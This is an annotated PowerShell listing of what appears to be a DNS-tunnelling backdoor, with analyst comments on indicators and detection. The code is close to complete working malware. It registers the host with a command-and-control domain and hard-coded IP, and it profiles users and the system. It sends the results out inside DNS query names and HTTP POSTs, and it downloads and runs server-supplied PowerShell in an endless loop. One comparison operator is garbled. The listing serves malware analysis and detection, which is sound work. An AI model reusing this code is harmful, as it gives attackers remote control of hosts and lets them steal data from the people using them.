- # This section should be omitted as it is present in Stager
- # =============================================================================
- # Hard-coded domain list. It is handed to Register-Bot, Do-Bad-Job and Main-Loop at the
- # bottom of the script and becomes the suffix of every DNS name the script queries.
- # Analyst note: the list has a single entry, so there is no fallback domain in this
- # listing and the value is a stable network indicator for the sample.
- $domains = @("hellobot.fun")
- # Pick-Domain: choose one entry from $DomainList.
- # A one-element list is returned as-is; otherwise a uniformly random index
- # (Get-Random -Maximum <count>) selects the entry.
- function Pick-Domain {
- Param($DomainList)
- if ($DomainList.count -eq 1) {
- return $DomainList
- }
- return $DomainList[(Get-Random -Maximum ([array]$DomainList).count)]
- }
- # Identify-Machine: derive the per-host identifier used as a label in every DNS name
- # and as the "hwid" field of the HTTP upload.
- # It is the first 10 upper-case hex characters of MD5(UTF-8 bytes of the BIOS serial
- # number read from WMI class Win32_BIOS).
- # Analyst note: the value is deterministic, so an investigator who knows a host's BIOS
- # serial can recompute it and match that host against DNS or proxy logs.
- function Identify-Machine() {
- $serial = Get-WmiObject Win32_BIOS | Select -ExpandProperty SerialNumber
- $md5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider
- $hash = ($md5.ComputeHash([system.Text.Encoding]::UTF8.GetBytes($serial)) | foreach { $_.ToString("X2") }) -join ""
- return $hash.Substring(0, 10)
- }
- # Try-Domains: run $Action against a randomly chosen domain and, if it throws,
- # retry recursively with that domain filtered out of the list.
- # Throws "No domains" once the list is empty, which is how callers learn that
- # every domain failed.
- # NOTE(review): the script blocks passed in by callers in this file read $domain
- # without declaring a parameter; they appear to rely on PowerShell dynamic scoping
- # to see the local $domain assigned here - confirm.
- function Try-Domains {
- [CmdletBinding()]
- param([Parameter(ValueFromPipeline)]$DomainList, [Parameter()][scriptblock]$Action)
- if ($DomainList.count -eq 0) {
- Throw "No domains"
- }
- $domain = Pick-Domain $DomainList
- try {
- return $Action.Invoke($domain)
- } Catch {
- # NOTE(review): the comparison operator in the filter below is garbled on this page
- # (rendered as a Greek letter followed by "ne"); presumably "-ne" in the original
- # sample - confirm against the source paste.
- return Try-Domains ($DomainList | Where-Object { $_ βne $domain }) $Action
- }
- }
- # Do-DNS: resolve name $dns for record type $type and return the raw answer objects.
- # -Server pins the lookup to a hard-coded resolver IP instead of the system resolver,
- # and -DnsOnly restricts resolution to the DNS protocol.
- # -ErrorAction Stop turns a failed lookup into a terminating error, which is what the
- # try/catch in Try-Domains reacts to.
- # Analyst note: because the queries go straight to the address on the Resolve-DnsName
- # line, they do not appear in the organisation's recursive-resolver logs; look for
- # outbound DNS from workstations to a non-approved resolver in firewall/flow data.
- function Do-DNS {
- [CmdletBinding()]
- param([Parameter()]$dns, [Parameter()]$type)
- Write-Debug "[DNS] (${type}) ==> ${dns}"
- $data = Resolve-DnsName -Type $type $dns -ErrorAction Stop -DnsOnly -Debug:$false -Server 212.32.242.146
- return $data
- }
- # Do-DNS-TXT: perform the lookup through Do-DNS and return the Strings property of the
- # answers concatenated into one string (no separator).
- # $type is passed through unchanged; every caller in this listing passes TXT.
- function Do-DNS-TXT {
- [CmdletBinding()]
- param([Parameter()]$dns, [Parameter()]$type)
- return (Do-DNS $dns $type | Select -ExpandProperty Strings) -join ''
- }
- # Decode-String: reverse the server-side encoding of a payload.
- # Steps: Base64-decode $Code, gunzip the bytes (Get-DecompressedByteArray), interpret
- # the result as UTF-8 text and return it.
- # Analyst note: the same three steps recover the plaintext from a TXT answer captured
- # in a packet trace.
- function Decode-String {
- [CmdletBinding()]
- param([Parameter(ValueFromPipeline)]$Code)
- Write-Debug "Decode-Str: $Code"
- $gzipBytes = [System.Convert]::FromBase64String($Code)
- $codeBytes = Get-DecompressedByteArray($gzipBytes)
- return [system.Text.Encoding]::UTF8.GetString($codeBytes)
- }
- # =============================================================================
- # Get-CompressedByteArray: gzip-compress $byteArray in memory and emit the compressed
- # bytes on the pipeline.
- # Parameter: -byteArray (mandatory, accepts pipeline input).
- function Get-CompressedByteArray {
- [CmdletBinding()]
- Param (
- [Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]
- [byte[]] $byteArray = $(Throw("-byteArray is required"))
- )
- Process {
- Write-Verbose "Get-CompressedByteArray"
- [System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream
- $gzipStream = New-Object System.IO.Compression.GzipStream $output, ([IO.Compression.CompressionMode]::Compress)
- $gzipStream.Write( $byteArray, 0, $byteArray.Length )
- # Closing the gzip stream flushes the trailer into $output before the bytes are read.
- $gzipStream.Close()
- $output.Close()
- # MemoryStream.ToArray is still usable after Close.
- $tmp = $output.ToArray()
- Write-Output $tmp
- }
- }
- # Get-DecompressedByteArray: gunzip $byteArray in memory and emit the decompressed
- # bytes on the pipeline.
- # Parameter: -byteArray (mandatory, accepts pipeline input).
- # No size limit is applied to the decompressed output.
- function Get-DecompressedByteArray {
- [CmdletBinding()]
- Param (
- [Parameter(Mandatory,ValueFromPipeline,ValueFromPipelineByPropertyName)]
- [byte[]] $byteArray = $(Throw("-byteArray is required"))
- )
- Process {
- Write-Verbose "Get-DecompressedByteArray"
- # $input is also a PowerShell automatic variable; the code reuses the name as a local.
- # The leading comma passes the byte array as a single constructor argument.
- $input = New-Object System.IO.MemoryStream( , $byteArray )
- $output = New-Object System.IO.MemoryStream
- $gzipStream = New-Object System.IO.Compression.GzipStream $input, ([IO.Compression.CompressionMode]::Decompress)
- $gzipStream.CopyTo( $output )
- $gzipStream.Close()
- $input.Close()
- [byte[]] $byteOutArray = $output.ToArray()
- Write-Output $byteOutArray
- }
- }
- # Encode-Base58: encode a byte sequence as a Base58 string.
- # The 58-character alphabet omits 0, O, I and l, so the output consists only of
- # letters and digits.
- # Algorithm: fold the bytes (most significant first) into a BigInteger, emit digits by
- # repeated division by 58, then prepend one '1' per leading zero byte.
- function Encode-Base58{
- [CmdletBinding()]
- param([Parameter()]$bytes)
- $base58digits = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
- # get big int representation
- $dBig = New-Object System.Numerics.BigInteger 0
- $bytes | %{ $dBig = $dBig * 256 + $_ }
- # combine into string
- $result = [System.String]::Empty
- while ($dBig -gt 0) {
- $rem = $dBig % 58
- $dBig /= 58
- $result = $base58digits[$rem] + $result
- }
- # Leading zero bytes vanish in the integer form, so they are restored as '1' digits.
- foreach ($b in $bytes) {
- if ($b -ne 0) { break }
- $result = '1' + $result
- }
- return $result
- }
- # Encode-Data: turn a string into a dotted sequence of DNS-safe labels.
- # Steps: UTF-8 bytes -> gzip -> Base58 -> split into chunks of at most 63 characters
- # joined with '.'. 63 is the maximum length of a single DNS label.
- # Analyst note: the result is what Do-Bad-Job places at the front of its A-record
- # queries, so long, random-looking mixed-case labels under the domain in $domains are
- # the observable trace of this function.
- function Encode-Data{
- [CmdletBinding()]
- param([Parameter()]$data)
- $bytes = [system.Text.Encoding]::UTF8.GetBytes($data)
- $gzipbytes = Get-CompressedByteArray $bytes
- $b58bytes = Encode-Base58 $gzipbytes
- $split = ([regex]::matches($b58bytes, '.{1,63}') | %{$_.value}) -join '.'
- return $split
- }
- # Encode-HTTP-Data: UTF-8 encode $data, gzip it and return the result as Base64 text.
- # This is the inverse of Decode-String.
- function Encode-HTTP-Data {
- [CmdletBinding()]
- param([Parameter()]$data)
- $bytes = [system.Text.Encoding]::UTF8.GetBytes($data)
- $gzipbytes = Get-CompressedByteArray $bytes
- return [System.Convert]::ToBase64String($gzipbytes)
- }
- # =============================================================================
- # Register-Bot: announce this host to the server.
- # Issues a TXT lookup for "<machine id>.add.<domain>" and expects the answer "1";
- # any other answer throws "Bad registration".
- # Analyst note: the fixed ".add." label makes the first query of an infection easy to
- # find in DNS telemetry.
- function Register-Bot {
- [CmdletBinding()]
- param([Parameter()]$DomainList)
- $regSuccess = Try-Domains $DomainList {
- return Do-DNS-TXT "$(Identify-Machine).add.$domain" TXT
- }
- if ($regSuccess -ne "1") {
- throw "Bad registration"
- }
- }
- # Execute-Dict: treat every value of the dictionary $Data as a command string, run it
- # through Exec-Timeout and return a new hashtable mapping the same keys to the results.
- # A command that throws is recorded as the string "Failure" instead of aborting the run.
- # Analyst note: this is the point where strings supplied by the caller (including
- # strings fetched from the server in Main-Loop) become executed code.
- function Execute-Dict {
- [CmdletBinding()]
- param([Parameter(ValueFromPipeline)]$Data)
- $output = @{}
- $Data.GetEnumerator() | % {
- $val = try { Exec-Timeout $_.value } catch { "Failure" }
- $output[$_.key] = $val
- }
- return $output
- }
- # Do-Bad-Job: run the commands in $Data and send each result out inside a DNS query.
- # For every key/result pair the result is encoded with Encode-Data and an A-record
- # lookup is made for "<encoded result>.<key>.<machine id>.i.<domain>".
- # The answer 1.1.1.1 is treated as the acknowledgement; any other answer throws, which
- # makes Try-Domains retry on the remaining domains.
- # Failures for one key are caught and logged with Write-Debug so the other keys still run.
- # Analyst note: the data leaves the host in the query name itself, so the lookup is the
- # exfiltration; the ".i." label and the long leading labels are the pattern to search
- # for in DNS logs.
- function Do-Bad-Job {
- [CmdletBinding()]
- param([Parameter()]$DomainList, [Parameter()]$Data)
- Execute-Dict $Data | %{$_.GetEnumerator()} | %{
- try {
- $letter = $_.key
- $sdata = $_.value
- $enc = Encode-Data $sdata
- Write-Debug "[General data] ${letter}: ${sdata} => ${enc}"
- Try-Domains $DomainList {
- $response = Do-DNS "${enc}.${letter}.$(Identify-Machine).i.$domain" A | Select -ExpandProperty IPAddress
- if ($response -ne '1.1.1.1') {
- Throw 'Bad response 3'
- }
- }
- } catch {
- Write-Debug "[General data] Unable to send ${letters}"
- }
- }
- Write-Debug "[General data] Complete"
- }
- # Read-Mode: fetch the current polling mode from the server.
- # Issues a TXT lookup for "<machine id>.mx1.<domain>" and returns the answer text;
- # Main-Loop maps the values '0', '1' and '3' to its sleep behaviour.
- function Read-Mode {
- [CmdletBinding()]
- param([Parameter()]$DomainList)
- return Try-Domains $DomainList {
- return Do-DNS-TXT "$(Identify-Machine).mx1.$domain" TXT
- }
- }
- # Get-WWW-PS: fetch a payload in a single TXT lookup for "<machine id>.www.<domain>"
- # and decode it with Decode-String (Base64 + gzip).
- # The chosen domain is printed with Write-Host.
- # No caller of this function is visible in this listing; Main-Loop uses Get-Tasks instead.
- function Get-WWW-PS {
- [CmdletBinding()]
- param([Parameter()]$DomainList)
- return Try-Domains $DomainList {
- Write-Host $domain
- return Do-DNS-TXT "$(Identify-Machine).www.$domain" TXT | Decode-String
- }
- }
- # Send-HTTP-Data: upload task results to the server with an HTTP POST.
- # The body is a hashtable with two fields: "hwid" (Identify-Machine) and "data"
- # ($data serialised with ConvertTo-Json -Depth 4).
- # $encdata is computed but not used by the active code, and $DomainList is only
- # referenced in the commented-out variant at the end.
- # HTTP errors are caught and their status code and description written with Write-Host.
- # Analyst note: the request is plain HTTP to a literal IP address, so the host, the
- # path "/index.php?r=bot-result%2Findex" and the uncompressed JSON results are visible
- # to a proxy or network sensor.
- function Send-HTTP-Data {
- [CmdletBinding()]
- param([Parameter()]$DomainList, [Parameter()]$data)
- # encode data
- $encdata = Encode-HTTP-Data $data
- $myData = @{"hwid" = $(Identify-Machine); "data" = $data | ConvertTo-Json -Depth 4}
- # The JSON text is also emitted on the output stream here.
- $myData["data"] | Out-String
- try {
- Invoke-WebRequest -Uri "http://212.32.242.146/index.php?r=bot-result%2Findex" -Body $myData -Method POST
- #Invoke-WebRequest -UseBasicParsing http://212.32.242.146/index.php?r=bot-result%2Findex -ContentType "application/json" -Method POST -Body "{ 'hwid':$myData["hwid"], 'data':$myData["data"]}"
- } catch {
- Write-Host "StatusCode:" $_.Exception.Response.StatusCode.value__
- Write-Host "StatusDescription:" $_.Exception.Response.StatusDescription
- }
- #return Try-Domains $DomainList {
- # Write-Debug "[HTTP] ===> http://$(Identify-Machine).http.$domain"
- # #return Invoke-WebRequest -Uri "http://$(Identify-Machine).http.$domain" -Body $data -Method POST
- # return Invoke-WebRequest -Uri "http://212.32.242.146/index.php?r=bot-result%2Findex" -Body $myData -Method POST
- #}
- }
- # Main-Loop: endless poll / execute / report cycle.
- # Each iteration:
- #   1. reads the mode (Read-Mode) and maps it to a sleep interval in seconds:
- #      '0' -> 30 minutes, '1' -> 12 hours, anything else -> 0;
- #   2. downloads a JSON task document (Get-Tasks), separates the "taskType" property
- #      from the remaining properties and executes the remaining values as commands
- #      (Execute-Dict);
- #   3. posts the results, with taskType added back, via Send-HTTP-Data;
- #   4. sleeps for the interval.
- # Any exception in steps 2-3 is caught, logged and the loop continues.
- # Analyst note: every property value of the downloaded JSON other than taskType is run
- # as PowerShell, so whoever controls the DNS answers controls code execution on the host.
- function Main-Loop {
- [CmdletBinding()]
- param([Parameter()]$DomainList)
- Write-Host "Main start"
- while (1) {
- # get mode
- # Reads the script-level $domains here rather than the $DomainList parameter.
- $mode = Read-Mode $domains
- $interval = 0
- switch ($mode){
- # In PowerShell, break inside a switch leaves the switch, not the enclosing while,
- # so mode '3' keeps the loop running with an interval of 0.
- '3' { break }
- '0' { $interval = 30*60 }
- '1' { $interval = 12*60*60 }
- }
- Write-Host "Interval mode: $mode"
- try {
- # NO www=exit HANDLING
- $data = Get-Tasks $DomainList
- $taskType = ''
- $data_new = @{}
- (ConvertFrom-Json $data).psobject.properties | Foreach { if ($_.Name -ne 'taskType' ) { $data_new[$_.Name] = $_.Value} else {$taskType = $_.Value} }
- $data = Execute-Dict $data_new
- $data['taskType'] = $taskType
- Write-Debug "[Main-Loop] Data: ${data}"
- # convert to dictionary if not a dictionary
- if ($data -isnot [System.Collections.IDictionary]){
- $data = @{'response'=$data}
- }
- # if not OK code -- exception
- Send-HTTP-Data $DomainList $data
- } catch {
- Write-Debug "[Main-Loop] Execution crashed"
- Write-Host $Error[0]
- }
- Write-Debug "[Main-Loop] Start sleeping for ${interval}s"
- Start-Sleep -s $interval
- }
- }
- # Exec-Timeout: execute the string $command as PowerShell with a 10-second time limit.
- # The string is passed to a background job whose script block calls Invoke-Expression
- # on it. If the job finishes within the timeout its output is returned; otherwise the
- # default string "failure" is returned. The job is force-removed in both cases.
- # The command text is printed with Write-Host before it runs.
- # Analyst note: this is the execution primitive for every server-supplied task.
- # PowerShell script block logging and process-creation telemetry for the job's child
- # PowerShell process are the places to look for the commands that were run.
- function Exec-Timeout {
- [CmdletBinding()]
- param([Parameter(ValueFromPipeline)][string]$command)
- $timeoutSeconds = 10
- $val = "failure"
- Write-Host $command
- $code = {
- param($c)
- Invoke-Expression $c
- }
- $j = Start-Job -ScriptBlock $code -ArgumentList $command
- if (Wait-Job $j -Timeout $timeoutSeconds) {
- $val = Receive-Job $j
- }
- Remove-Job -force $j
- return $val
- }
- # Get-Tasks: download a task document in numbered parts over DNS and decode it.
- # For part N (starting at 0) the name "<machine id>.www.<N>.<domain>" is queried twice:
- #   - the A record carries a check value, and the answer 0.0.0.0 marks the end;
- #   - the TXT record carries the next piece of the Base64 payload.
- # A part is accepted only when the A address, converted to an integer, equals the first
- # 8 hex characters of MD5(TXT text) converted to an integer; both sides are compared in
- # the form returned by To-Bin-Number. On a match the piece is appended, a domain is
- # picked again and N is incremented; on a mismatch the same part is requested again.
- # The concatenated pieces are finally passed through Decode-String (Base64 + gzip).
- # Ip-To-Long, To-Bin-Number and Hex-To-Int are not defined in this listing.
- # Analyst note: the check value detects corrupted parts only; it does not authenticate
- # the sender. The paired A/TXT lookups with an incrementing numeric label after ".www."
- # are a recognisable sequence in DNS logs.
- function Get-Tasks {
- [CmdletBinding()]
- param([Parameter(ValueFromPipeline)]$DomainList)
- $stage = ''
- $domain = Pick-Domain $DomainList
- $partStage = 0
- $dns = "$(Identify-Machine).www.$partStage.$domain"
- $dnsResponseA = Do-Dns $dns A | Select -ExpandProperty IPAddress
- while ($dnsResponseA -ne '0.0.0.0') {
- $bigInt = Ip-To-Long $dnsResponseA
- $bin = To-Bin-Number $bigInt
- $dnsResponseTXT = (Do-DNS $dns TXT | Select -ExpandProperty Strings) -join ''
- $md5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider
- $hash = ($md5.ComputeHash([system.Text.Encoding]::UTF8.GetBytes($dnsResponseTXT)) | foreach { $_.ToString("X2") }) -join ""
- # First 8 hex characters (32 bits) of the MD5 digest.
- $txtHex = [string]$hash[0] + [string]$hash[1] + [string]$hash[2] + [string]$hash[3] + [string]$hash[4] + [string]$hash[5] + [string]$hash[6] + [string]$hash[7]
- $txtInt = Hex-To-Int $txtHex
- $txtBin = To-Bin-Number $txtInt
- if ([string]$bin -eq [string]$txtBin) {
- $stage += $dnsResponseTXT
- $domain = Pick-Domain $DomainList
- $partStage++
- }
- $dns = "$(Identify-Machine).www.$partStage.$domain"
- $dnsResponseA = Do-Dns $dns A | Select -ExpandProperty IPAddress
- }
- return [string]$stage | Decode-String
- }
- # Initial host-profiling commands, keyed by the short label that Do-Bad-Job places in
- # the DNS name. The values are single-quoted, so nothing is evaluated here; each string
- # is executed later by Execute-Dict / Exec-Timeout.
- # Collected items: user name (u), user domain (d), OS caption (o), host name (h),
- # the constant 1 (a), registered organisation or "NoOrg" (org), OS architecture (arc).
- $baseData = @{
- 'u'='$env:username'
- 'd'='$env:userdomain'
- 'o'='Get-WmiObject Win32_OperatingSystem | Select -ExpandProperty Caption'
- 'h'='hostname'
- 'a'='1'
- 'org'='Get-WmiObject Win32_OperatingSystem | Select -ExpandProperty Organization | %{if ([string]::IsNullOrEmpty($_)) {"NoOrg"} else {$_}}'
- 'arc'='Get-WmiObject Win32_OperatingSystem | Select -ExpandProperty OSArchitecture'
- }
- # Script entry point.
- # First the console output encoding is switched to UTF-8; a failure is only printed.
- try {
- [Console]::OutputEncoding = [Text.UTF8Encoding]::UTF8
- } catch {
- Write-Host $Error[0]
- }
- # Then the three stages run in order: registration over DNS, upload of the $baseData
- # host profile over DNS, and the endless task loop. Any exception that escapes is
- # written with Write-Debug only, so by default the script ends without visible output.
- try {
- # register bot
- Register-Bot $domains
- # send data
- Do-Bad-Job $domains $baseData
- # enter main loop
- Main-Loop $domains
- } catch {
- Write-Debug $Error[0]
- }